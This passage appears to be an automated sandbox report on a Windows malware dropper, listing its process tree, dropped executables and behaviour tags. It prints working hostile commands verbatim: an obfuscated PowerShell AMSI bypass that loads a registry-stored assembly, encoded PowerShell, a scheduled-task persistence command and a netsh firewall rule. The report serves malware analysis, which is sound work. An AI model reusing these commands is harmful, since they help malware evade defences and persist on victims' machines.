memory of 1708 3160 sysnldcvmr.exe 106 PID 1708 wrote to memory of 3404 1708 1109125257.exe 107 PID 1708 wrote to memory of 3404 1708 1109125257.exe 107 PID 1708 wrote to memory of 2972 1708 1109125257.exe 109 PID 1708 wrote to memory of 2972 1708 1109125257.exe 109 PID 3404 wrote to memory of 3764 3404 cmd.exe 111 PID 3404 wrote to memory of 3764 3404 cmd.exe 111 PID 2972 wrote to memory of 1584 2972 cmd.exe 112 PID 2972 wrote to memory of 1584 2972 cmd.exe 112 PID 3160 wrote to memory of 908 3160 sysnldcvmr.exe 113 PID 3160 wrote to memory of 908 3160 sysnldcvmr.exe 113 PID 3160 wrote to memory of 908 3160 sysnldcvmr.exe 113 PID 4988 wrote to memory of 4304 4988 4363463463464363463463463.exe 114 PID 4988 wrote to memory of 4304 4988 4363463463464363463463463.exe 114 PID 4988 wrote to memory of 4304 4988 4363463463464363463463463.exe 114 PID 4988 wrote to memory of 3592 4988 4363463463464363463463463.exe 115 PID 4988 wrote to memory of 3592 4988 4363463463464363463463463.exe 115 PID 4988 wrote to memory of 3592 4988 4363463463464363463463463.exe 115 PID 4988 wrote to memory of 236 4988 4363463463464363463463463.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
Processes:
cluton.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cluton.exe -
outlook_win_path 1 IoCs
Processes:
cluton.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cluton.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:536
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d0090ce5-f183-4dfa-97c3-afcbda887ee3}2⤵PID:5892
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3940055 /state1:0x41c64e6d2⤵PID:4124
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1248
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4412
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe2⤵
- Executes dropped EXE
PID:5052
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe2⤵
- Executes dropped EXE
PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe2⤵
- Executes dropped EXE
PID:5156
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe2⤵
- Executes dropped EXE
PID:5988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nzmkXGPTzWRj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fHSXJWpbgBwerD,[Parameter(Position=1)][Type]$jMqinvyapW)$QLDrAVnbSOp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+'cte'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+'ory'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+',Pub'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$QLDrAVnbSOp.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+'Nam'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$fHSXJWpbgBwerD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');$QLDrAVnbSOp.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'','P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+'S'+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+'',$jMqinvyapW,$fHSXJWpbgBwerD).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $QLDrAVnbSOp.CreateType();}$fpnncAwptbASn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+'e'+'Me'+[Char](116)+''+'h'+'o'+[Char](100)+'s');$wHDgSzTmXwxYYY=$fpnncAwptbASn.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$breipgLMhFtgFPEvvQy=nzmkXGPTzWRj @([String])([IntPtr]);$LxvPBQznoXNijSpxxAtPgV=nzmkXGPTzWRj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DjNLBPoffey=$fpnncAwptbASn.GetMethod(''+'G'+''+[Char](101)+''+'t'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$oIkOXeqKwllAcQ=$wHDgSzTmXwxYYY.Invoke($Null,@([Object]$DjNLBPoffey,[Object](''+[Char](76)+'oa'+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'y'+'A'+'')));$LBznHbLgsiADMnPyw=$wHDgSzTmXwxYYY.Invoke($Null,@([Object]$DjNLBPoffey,[Object]('V'+[Char](105)+'r'+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+'o'+''+'t'+''+'e'+'ct')));$qSsKgCu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oIkOXeqKwllAcQ,$breipgLMhFtgFPEvvQy).Invoke('am'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$KyyDDYbxsrJEJTObh=$wHDgSzTmXwxYYY.Invoke($Null,@([Object]$qSsKgCu,[Object]('Am'+'s'+'i'+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$IDZzQRkZvO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LBznHbLgsiADMnPyw,$LxvPBQznoXNijSpxxAtPgV).Invoke($KyyDDYbxsrJEJTObh,[uint32]8,4,[ref]$IDZzQRkZvO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KyyDDYbxsrJEJTObh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LBznHbLgsiADMnPyw,$LxvPBQznoXNijSpxxAtPgV).Invoke($KyyDDYbxsrJEJTObh,[uint32]8,0x20,[ref]$IDZzQRkZvO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:5356
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe2⤵PID:5940
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe2⤵PID:7008
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe2⤵PID:7000
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe2⤵PID:4336
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1500
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2576
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1964
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004DC2⤵PID:6368
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2096
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
- Modifies data under HKEY_USERS
PID:2140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2748
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2816
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3144
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe"C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 13084⤵
- Program crash
PID:4848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 14084⤵
- Program crash
PID:4104
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"3⤵
- Executes dropped EXE
PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:336
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Users\Admin\AppData\Local\Temp\wnxddd.exe"C:\Users\Admin\AppData\Local\Temp\wnxddd.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:356
-
-
-
C:\Users\Admin\AppData\Local\Temp\xrmcsj.exe"C:\Users\Admin\AppData\Local\Temp\xrmcsj.exe"4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs"5⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe"C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" -enc JABLAHgAcAByAGsAdABqAG8AbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABOAHkAdgBoAHkAeAB2AGsAaQAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEsAeABwAHIAawB0AGoAbwBvACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEwAZQBwAGsAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABOAHkAdgBoAHkAeAB2AGsAaQAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQARABmAGEAdwBuAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEwAZQBwAGsAbAAgACkAOwAkAEMAYwB5AGMAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABEAGYAYQB3AG4AbwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAuAEMAbwBwAHkAVABvACgAIAAkAEMAYwB5AGMAaQAgACkAOwAkAE4AbABhAHMAegBhAHEAaABkAHEALgBDAGwAbwBzAGUAKAApADsAJABEAGYAYQB3AG4AbwAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEwAZQBwAGsAbAAgAD0AIAAkAEMAYwB5AGMAaQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATABlAHAAawBsACkAOwAgACQARABqAGkAaABjAGMAaABtAHoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABMAGUAcABrAGwAKQA7ACAAJABKAG4AegBhAHgAagAgAD0AIAAkAEQAagBpAGgAYwBjAGgAbQB6AC4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7ACAAWwBTAHkAcwB0AGUAbQAuAEQAZQBsAGUAZwBhAHQAZQBdADoAOgBDAHIAZQBhAHQAZQBEAGUAbABlAGcAYQB0AGUAKABbAEEAYwB0AGkAbwBuAF0ALAAgACQASgBuAHoAYQB4AGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEoAbgB6AGEAeABqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"3⤵
- Executes dropped EXE
PID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"3⤵
- Executes dropped EXE
PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Users\Admin\AppData\Local\Temp\1109125257.exeC:\Users\Admin\AppData\Local\Temp\1109125257.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:3764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:1584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2031716674.exeC:\Users\Admin\AppData\Local\Temp\2031716674.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:908 -
C:\Users\Admin\AppData\Local\Temp\2066210983.exeC:\Users\Admin\AppData\Local\Temp\2066210983.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\182506255.exeC:\Users\Admin\AppData\Local\Temp\182506255.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3556
-
-
C:\Users\Admin\AppData\Local\Temp\786127328.exeC:\Users\Admin\AppData\Local\Temp\786127328.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\3285315584.exeC:\Users\Admin\AppData\Local\Temp\3285315584.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\1172211728.exeC:\Users\Admin\AppData\Local\Temp\1172211728.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4968
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4304 -
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:464 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" "Runtime Broker.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Time Discovery
PID:1564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\njSilent.exe"C:\Users\Admin\AppData\Local\Temp\Files\njSilent.exe"3⤵
